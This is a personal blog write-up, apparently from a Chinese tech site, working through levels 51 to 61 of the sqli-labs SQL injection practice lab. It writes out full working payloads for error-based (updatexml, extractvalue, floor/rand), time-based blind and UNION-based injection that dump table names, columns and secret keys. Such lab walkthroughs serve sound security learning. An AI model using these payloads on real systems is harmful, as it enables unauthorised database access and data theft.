SQL注入学习part06:(结合sqli-libs学习:51-61关)

写在前面:
此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出。欢迎各位前来交流。(部分材料来源网络,若有侵权,立即删除)

第五十一关

在这里插入图片描述

  • 简单的单引号加注释符就测试出来了闭合符
  • 构造语句'and updatexml(1,concat(0x7e,database(),0x7e),1)%23
    在这里插入图片描述
  • easy
  • get it

第五十二关

在这里插入图片描述

  • 判断应该是数字型无闭合符
  • 并且没有报错回显
  • 所以只能采用时间盲注
    在这里插入图片描述
  • sleep()执行了说明构造语句结构没错
  • 构造sql注入语句进行时间盲注
  • ?sort=1 and if(ascii(substr(database(),1,1))=115,sleep(3),0);%23
  • get it

第五十三关

在这里插入图片描述

  • 确定了闭合符为单引号
  • 尝试使用五十一的方法
    在这里插入图片描述
  • 发现不行
  • 因为没有报错回显
  • 所以使用上一题的盲注方法
  • ?sort=1%27%20and%20if(ascii(substr(database(),1,1))=115,sleep(3),0);%23
    在这里插入图片描述
  • get it

第五十四关

在这里插入图片描述

  • 多多少少看起来有点懵
    在这里插入图片描述
  • 报错情况
The objective of this challenge is to dump the (secret key) from only random table from Database ('CHALLENGES') in Less than 10 attempts
For fun, with every reset, the challenge spawns random table name, column name, table data. Keeping it fresh at all times.

  • 翻译翻译就是在数据库中找类似flag的密钥
  • 有点ctf的感觉了
  • 且限定次数不超过十次
  • 将id作为1参数传入
    在这里插入图片描述
  • 第一次:单引号注释符尝试出闭合符为单引号
  • 第二次:找显示位(好像回到了梦开始的地方)
    在这里插入图片描述
  • 这里手滑忘记改成-1浪费了一次机会
  • 第三次:同上
    在这里插入图片描述
  • 找到显示位了
  • 已近知道数据库的名字
  • 下一步就是爆表名
  • 构造语句?id=0' union select 1,2,group_concat(table_name)from information_schema.tables where table_schema="challenges"; %23
    在这里插入图片描述
  • 找到表名:1koosne610
  • 下一步就是在表中找列
  • 构造sql注入语句?id=0' union select 1,2,group_concat(column_name)from information_schema.columns where table_name="1koosne610"%23
    在这里插入图片描述
  • id,sessid,secret_ET8R,tryy
  • 显然我们要找到的列名应该是secret_ET8R
  • 构造sql注入语句
  • ?id=0' union select 1,2,group_concat(secret_ET8R)from challenges.1koosne610%23
    在这里插入图片描述
  • 出结果了
  • oKGNaIpBnRkdA7Wrw95QptxQ
    在这里插入图片描述
  • get it

第五十五关

在这里插入图片描述

  • 情况和上一题差不多
  • 考虑到增加了十四次可能会出现报错不回显或者报错回显结果单一的情况
  • 先猜一次闭合符吧
    在这里插入图片描述
  • 不是双引号
    在这里插入图片描述
  • 试到第六次发现是数字型的没有闭合符
  • 那就显示位开冲
  • 试到最后也没有结果
  • 重开
  • 尝试了一个括号闭合
  • 发现成功了
    在这里插入图片描述
  • 第一次遇到只有括号的情况
  • 也是醉了
  • 那就显示位走运行流程
    在这里插入图片描述
  • 同样的原因浪费了一次机会
  • 下一步根据已知数据库名爆表名
  • 构造语句
  • ?id=0) union select 1,2,group_concat(table_name)from information_schema.tables where table_schema="challenges"; %23
    在这里插入图片描述
  • 得到结果,下一步爆列名;w70yw7lrz6
  • ?id=0) union select 1,2,group_concat(column_name)from information_schema.columns where table_name="w70yw7lrz6"%23
    在这里插入图片描述
  • 一下子就在茫茫列海中找到它:,secret_T75R
  • 下一步直接冲它
  • ?id=0) union select 1,2,group_concat(secret_T75R)from challenges.w70yw7lrz6%23
    在这里插入图片描述
  • 出结果了
  • GTiuQeuTsz3PqJ8K2ydJhoUx
    在这里插入图片描述
  • get it

第五十六关

在这里插入图片描述

  • 单走一个单引号加括号
  • 步骤同上
  • 几乎一模一样
  • 改一改闭合符就好了
  • get it

第五十七关

在这里插入图片描述

  • 闭合符为双引号
  • 步骤同上
  • get it

第五十八关

在这里插入图片描述

  • 试出来了单引号
  • 但是已近花了两次
  • 可以看到这边是没有返回在数据库中查询到的数据
  • 但是前面尝试闭合符的时候发现报错显示是正常显示的
  • 所以这道题可以使用报错注入
  • ?id=-1'union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))%23
    在这里插入图片描述
  • 得到了表名2eh90ft4l8
  • 继续爆列名:
  • 构造sql注入报错注入语句
  • ?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='2eh90ft4l8'),0x7e))--+
    在这里插入图片描述
  • 出结果了
  • 下一步直接开冲
  • secret_E5EI
  • ?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(secret_E5EI) from 2eh90ft4l8),0x7e))--+
    在这里插入图片描述
  • 找到key:TjQN43SlRSVnQv8CNvTA8Q6Q
    在这里插入图片描述

第五十九关

在这里插入图片描述

  • 多次尝试闭合符未果,果断认为是整数型
  • 查看表?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)--+

在这里插入图片描述

  • y3oefysnek
  • 下一步进行报错注入查询列名
  • ?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘y3oefysnek’),0x7e),1)–+
    在这里插入图片描述
  • 试了很多次
  • 报错的原因可能不是方法的问题
  • 估计是搭的靶场有问题
  • pass

第六十关

在这里插入图片描述

  • 试出闭合符号为双引号带括号
  • 下一步判断显示位
    在这里插入图片描述
  • 判断失败,直接报错注入吧
  • ?id=0")%20and%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),0x7e),1)--+

在这里插入图片描述

  • nwt3793lnb
  • 下一步找列
  • and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘nwt3793lnb’),0x7e),1)%23
    在这里插入图片描述
  • 估计是平台的问题
  • pass

第六十一关

在这里插入图片描述

  • 猜测闭合符应该是双引号

  • 并且是有报错回显的

  • 最稳妥的是报错注入

  • 但是多次尝试在报错中发现闭合符应该是 '))

  • 重新进行报错注入
    在这里插入图片描述

  • ef5aonzc0v

?id=-1')) union select 1,count(*),concat((select group_concat(table_name) from information_schema.tables where table_schema="challenges"),floor(2*rand()))a from information_schema.columns group by a;%23

?id=-1')) union select 1,count(*),concat((select group_concat(column_name) from information_schema.columns where table_name="ef5aonzc0v"),floor(2*rand()))a from information_schema.columns group by a;%23

?id=-1')) union select 1,count(*),concat((select `secret_QXGA` from challenges.ef5aonzc0v),floor(2*rand()))a from information_schema.columns group by a;%23

  • get it

end

摸鱼去了

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
本火锅店点餐系统采用Java语言和Vue技术,框架采用SSM,搭配Mysql数据库,运行在Idea里,采用小程序模式。本火锅店点餐系统提供管理员、用户两种角色的服务。总的功能包括菜品的查询、菜品的购买、餐桌预定和订单管理。本系统可以帮助管理员更新菜品信息和管理订单信息,帮助用户实现在线的点餐方式,并可以实现餐桌预定。本系统采用成熟技术开发可以完成点餐管理的相工作。 本系统的功能围绕用户、管理员两种权限设计。根据不同权限的不同需求设计出更符合用户要求的功能。本系统中管理员主要负责审核管理用户,发布分享新的菜品,审核用户的订餐信息和餐桌预定信息等,用户可以对需要的菜品进行购买、预定餐桌等。用户可以管理个人资料、查询菜品、在线点餐和预定餐桌、管理订单等,用户的个人资料是由管理员添加用户资料时产生,用户的订单内容由用户在购买菜品时产生,用户预定信息由用户在预定餐桌操作时产生。 本系统的功能设计为管理员、用户两部分。管理员为菜品管理、菜品分类管理、用户管理、订单管理等,用户的功能为查询菜品,在线点餐、预定餐桌、管理个人信息等。 管理员负责用户信息的删除和管理,用户的姓名和手机号都可以由管理员在此功能里看到。管理员可以对菜品的信息进行管理、审核。本功能可以实现菜品的定时更新和审核管理。本功能包括查询餐桌,也可以发布新的餐桌信息。管理员可以查询已预定的餐桌,并进行审核。管理员可以管理公告和系统的轮播图,可以安排活动。管理员可以对个人的资料进行修改和管理,管理员还可以在本功能里修改密码。管理员可以查询用户的订单,并完成菜品的安排。 当用户登录进系统后可以修改自己的资料,可以使自己信息的保持正确性。还可以修改密码。用户可以浏览所有的菜品,可以查看详细的菜品内容,也可以进行菜品的点餐。在本功能里用户可以进行点餐。用户可以浏览没有预定出去的餐桌,选择合适的餐桌可以进行预定。用户可以管理购物车里的菜品。用户可以管理自己的订单,在订单管理界面里也可以进行查询操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值